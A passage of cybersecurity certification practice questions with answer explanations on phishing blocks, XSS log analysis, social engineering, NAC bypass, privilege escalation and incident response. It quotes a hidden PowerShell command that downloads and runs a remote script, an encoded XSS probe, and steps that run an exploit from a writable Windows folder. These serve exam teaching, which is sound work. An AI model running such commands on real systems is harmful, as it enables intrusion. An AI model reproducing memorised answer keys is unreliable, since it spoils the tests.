D.Add http://www.freephone.io:8080/winner.php to the browsers group policy block list
Explanation:
OBJ-5.3: There are two ways to approach this question. First, you can consider which is the right answer (if you know it). By adding the full URL of the phishing link to the browser’s group policy block list (or black hole list), the specific webpage will be blocked from being accessed by the employees while allowing the rest of the freephone.io domain to be accessible. Now, why not just block the entire domain? Well, maybe the rest of the domain isn’t suspect, but just this one page is. (For example, maybe someone is using a legitimate site like GitHub to host their phishing campaign. Therefore you only want to block their portion of GitHub.) The second approach to answering this question would be to rule out the incorrect answers. If you used DENY TCP to the firewall ACL answer, you would block all access to the domain, blocking legitimate traffic as well as possible malicious activity. If you used the DENY IP ANY ANY to filter traffic at the IPS, you would block any IP traffic to ANY website over port 8080. If you added the link to the load balancer, this would not block it either. Therefore, we are only left with the correct answer of using a group policy in this case.
You are analyzing the logs of a web server and see the following entry:
- =-=-=-=-=–=-=-=-=-=–=-=-=-=-=-
192. 168.1.25 – – [05/Aug/2020:15:16:42 -0400] “GET /%27%27;!–%22%3CDION%3E=&{()} HTTP/1.1″ 404 310 “-” “Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12)Gecko/2009070812 Ubuntu/19.04 (disco dingo) Firefox/3.0.12″ - =-=-=-=-=–=-=-=-=-=–=-=-=-=-=-
Based on this entry, which of the following attacks was attempted? A.SQL Injection B.XML Injection C.Buffer Overflow D.XSS
D.XSS
Explanation:
OBJ-3.4: This is an example of an XSS attack as recorded by a web server’s log. In this example, the XSS attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (‘ ‘). While you don’t need to be able to decode the exact string used in the logs, when you see HTML encoding on the exam, it is usually going to be an XSS attack unless you see SQL or XML statements in the string, which in this case there are neither of those. Cross-site scripting (XSS) attacks use a specially crafted URL that includes attack code that will cause user information entered into their web browser to be sent to the attacker. An attacker finds a web server vulnerable to XSS and sends a legitimate-looking URL with XSS attack code appended to the end of the URL through a phishing email or other message to trick the user into clicking the link. A buffer overflow attempts to write data to a buffer that overruns the buffer’s boundary and writes data into the adjacent memory locations, which is not occurring in this example.
You are working as part of a penetration testing team during an assessment of Dion Training's headquarters. Your boss has requested that you search the company's recycling bins for any information that might be valuable during the reconnaissance phase of your attack. What type of social engineering method are you performing? A.Phishing B.Whaling C.Dumpster diving D.Impersonation
C.Dumpster diving
Explanation:
OBJ-3.1: Dumpster diving involves searching through publically accessible garbage cans or recycling bins to find discarded paper, manuals, or other valuable types of information from a targeted company. This is often done as part of the reconnaissance phase before an attack is performed.
A penetration tester issued the following command on a victimized Windows system:
- =-=-=-=-=-
c: \cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring(‘http://diontraining.com/updates’) - =-=-=-=-=-
Based on this command, which of the following exploits is the penetration tester MOST likely trying to conduct?
A.Exploiting an unquoted service paths
B.Download and execute a remote script
C.Conduct a DLL hijacking
D>Scheduling a task for persistence
B.Download and execute a remote script
Explanation:
OBJ-4.4: This command executes the PowerShell environment without loading the PowerShell profile (-nop) and in a hidden window (-w hidden). The command powershell.exe is running is shown after the -c, which stands for executing a command or script block and then exiting. This command in PowerShell to Invoke-Expression (IEX) creates a new web client object and then downloads the file located at the URL provided. This file could be malicious, and if it is another PowerShell script, it will be executed once downloaded.
You are planning an engagement with a new client. Which target type should be selected to test the organization's physical security using social engineering techniques like dumpster diving, tailgating, and piggybacking? A.Off-site B.Third-party hosted C.On-site D.External
C.On-site
Explanation:
OBJ-1.3: An on-site target type means that assets can be accessed physically where the attack is carried out. To conduct the attack, the attacker must be physically at the location. If the penetration test seeks to determine if an attacker could access their secure server room, an on-site target type would be required.
Which type of threat actor can accidentally or inadvertently cause a security incident in your organization? A.Organized Crime B.APT C.Insider Threat D.Hacktivist
C.Insider Threat
Explanation:
OBJ-1.3: An insider threat is a type of threat actor assigned privileges on the system that cause an intentional or unintentional incident. Insider threats can be used as unwitting pawns of external organizations or make crucial mistakes that can open up exploitable security vulnerabilities. Hacktivists, Organized Crimes, and advanced persistent threats (APT) entities do not accidentally or unwittingly target organizations. Instead, their actions are deliberate in nature. A hacktivist is an attacker that is motivated by a social issue or political cause. Organized crime is a type of threat actor that uses hacking and computer fraud for commercial gain. An advanced persistent threat (APT) is a type of threat actor who can obtain, maintain, and diversify access to network systems using exploits and malware.
Which attack method is MOST likely to be used by a malicious employee or insider trying to obtain another user's passwords? A.Phishing B.Shoulder surfing C.Man-in-the-middle D.Tailgating
B.Shoulder surfing
Explanation:
OBJ-3.1: While a malicious employee or insider could use all of the methods listed to obtain another user’s passwords, shoulder surfing is the MOST likely to be used. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder. Since a malicious employee or insider can work close to their victims (other users), they could easily use this technique to collect the victimized users’ passwords.
You are planning to exploit a network-based vulnerability against an organization as part of a penetration test. You attempted to connect your laptop to a port in their conference room. You were redirected to a captive portal for not meeting the organization’s approved security baseline for a Windows 10 laptop. Which of the following types of exploits should you use to bypass NAC and access the network?
A.Perform a remote code execution on the NAC controller
B.Harvest the user credentials of an employee and use those to connect
C.Conduct a denial of service attack against the network policy server
D.SPoof the MAC address of the rooms VOIP phone to your laptop
D.SPoof the MAC address of the rooms VOIP phone to your laptop
Explanation:
OBJ-3.2: Network access control (NAC) is used to prevent unhealthy devices from accessing an organization’s internal network. To break into a network that uses NAC, you must perform a NAC bypass attack. One popular NAC bypass method is to spoof the MAC or IP address of a printer or VOIP device since they cannot natively participate in NAC and are often whitelisted by administrators. Another method is to configure your attacking device to use IPv6 instead of IPv4. Most routers and switches support IPv4 and IPv6, but many system administrators only configure NAC for their IPv4 devices out of habit. The final method would be to set up a rogue wireless access point to create a man-in-the-middle condition. This would allow an authorized device to connect to your wireless access point and then use its authorized status to connect to the network.
Dion Training Solutions is conducting a penetration test of its facilities. The penetration testing team has been augmented by an employee of the company who has general user privileges. The security staff is unaware of the testing. According to NIST, which of the following types of penetration tests is being conducted? A.An overt external test B.A covert internal test C.An covert external test D.An overt internal test
B.A covert internal test
Explanation:
OBJ-1.3: This is considered an internal covert test. It is internal because an employee of the company is part of the team and provides them with general user privileges. This will simulate an insider threat attack. It is also considered covert because the security staff and system administrators are unaware of the ongoing test.
Jason is conducting a penetration test against an organization’s Windows network. This engagement aims to demonstrate what a trusted insider could do to the organization’s network. The organization provided Jason with a corporate laptop and a standard user account as an entry-level employee. He was able to download his exploit (exploit.exe) and some programs from SysInternals to his desktop. He then enters the following commands into the command shell from this standard user account:
-=-=-=-=-=-
C:\Users\jason\Desktop> exploit.exe
This program has been blocked by group policy. Contact your administrator to enable this program.
C:\Users\jason\Desktop> accesschk.exe -wsqud Users c:\Windows
rw c:\Windows\Temp
rw c:\Windows\Tracing
rw c:\Windows\Branding
C:\Users\jason\Desktop> copy exploit.exe c:\Windows\Branding
C:\Users\jason\Desktop> ....\Windows\Branding\exploit.exe
Exploit (v0.1) loading…
exploit(shell)>
-=-=-=-=-=-
Based on the output above, which of the following types of vulnerabilities was exploited? A.Writable service B.Unquoted service paths C.Insecure file/folder permissions D.Insecure sudo
C.Insecure file/folder permissions
Explanation:
OBJ-3.5: In this example, Jason used the accesschk program to determine which folders had write access within the Windows directory. When he found three that had insecure file/folder permissions, he copied his exploit to that folder (c:\Windows\Branding) and then attempted to run it from that location. Based on the results, it appears he was successful. This is likely due to the system administrator only allowing trusted programs to run from the Desktop.
(Sample Simulation – On the real exam for this type of question, you would have access to the log files to determine which server on a network might have been affected, and then choose the appropriate actions.) A cybersecurity analyst has determined that an attack has occurred against your company’s network. Fortunately, your company uses a good logging system with a centralized Syslog server, so all the logs are available, collected, and stored properly. According to the cybersecurity analyst, the logs indicate that the database server was the only company server on the network that appears to have been attacked. The network is a critical production network for your organization. Therefore, you have been asked to choose the LEAST disruptive actions on the network while performing the appropriate incident response actions. Which actions do you recommend as part of the response efforts?
A.Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server and maintain the chain of custody
B.Immediately remove the database server from the network, create an image of its hard disk and maintain the chain of custody
C.Isolate the affected server from the network immediately, format the database server, reinstall from a known good backup
D.Conduct a system restore of the database server, image the hard drive and maintain the chain of custody
A.Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server and maintain the chain of custody
Explanation:
OBJ-5.3: Since the database server is part of a critical production network, it is important to work with the business to time the remediation period to minimize productivity losses. You can immediately begin to capture network traffic since this won’t affect the database server or the network (least intrusive) while scheduling a period of downtime in which to take a forensic image of the database server’s hard drive. All network captures and the hard drive should be maintained under the chain of custody if needed for criminal prosecution or civil action after remediation. The server should be remediated and brought back online once the hard drive image has been created.
